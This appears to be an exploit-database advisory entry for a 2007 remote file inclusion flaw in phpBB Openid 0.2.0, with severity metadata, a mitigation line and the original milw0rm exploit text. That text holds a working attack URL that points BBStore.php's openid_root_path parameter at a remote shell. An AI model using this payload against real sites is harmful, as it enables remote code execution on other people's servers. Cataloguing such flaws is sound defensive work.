phpBB Openid 0.2.0 Remote File Include

vendor:

phpBB Openid

by:

milw0rm.com

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: phpBB Openid

Affected Version From: 0.2.0

Affected Version To: 0.2.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

phpBB Openid 0.2.0 Remote File Include

The vulnerability allows remote attackers to include arbitrary files via a specially crafted URL in the openid_root_path parameter in BBStore.php.

Mitigation:

Update to a patched version of phpBB Openid or implement proper input validation to prevent remote file inclusion.

Source

Exploit-DB raw data:

============================================
=                                          =
=             XORON  (c) 2007              =
=                                          =
============================================
=                                          =
=  phpBB Openid 0.2.0 Remote File Include  =
=                                          =
============================================
=
= Download:
= http://sourceforge.net/project/showfiles.php?group_id=178846
=
============================================
=
= Exploit:
= /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=shell?
=
============================================
=                                          =
=      Special thanks "k1tkat"  :)         =
=                                          =
============================================ 

# milw0rm.com [2007-09-30]